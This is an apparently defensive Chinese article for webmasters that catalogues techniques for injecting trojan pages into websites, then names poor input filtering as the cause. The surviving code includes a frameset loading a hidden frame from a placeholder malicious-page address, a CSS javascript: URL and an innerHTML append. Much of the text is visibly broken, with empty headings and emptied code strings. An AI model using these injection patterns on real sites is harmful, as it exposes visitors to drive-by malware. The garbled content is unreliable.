很多站长的网站都被挂过木马,如果你的站从来没被挂过木马的话,恭喜你了
一般黑客挂马的代码都是 这样的 其实还有很多挂马代码
下面全面介绍下
一:框架挂马
二:js文件挂马
首先将以下代码
document.write("");
保存为xxx.js,
则JS挂马代码为
三:js变形加密
muma.txt可改成任意后缀
四:body挂马
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '';
六:css中挂马
body {
background-image: url('javascript:document.write("")')}
七:JAJA挂马
八:图片伪装
九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网站" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
页面要显示的
内容
实际上,挂木马的基本技术就是利用脚本程序发帖和提交信息的过滤不严格,使得我们可以将一些HTML或者脚本代码段作为文本提交,但是能被脚本解析.
从这个思想出发,可以利用正则表达的技术构造出更加巧妙的挂马技术.防止这种攻击的技术就是对所有的用户提交的数据在发布前必须经过类型检验
通过上面的知识,站长对碰到此类问题应该知道怎么清除了吧。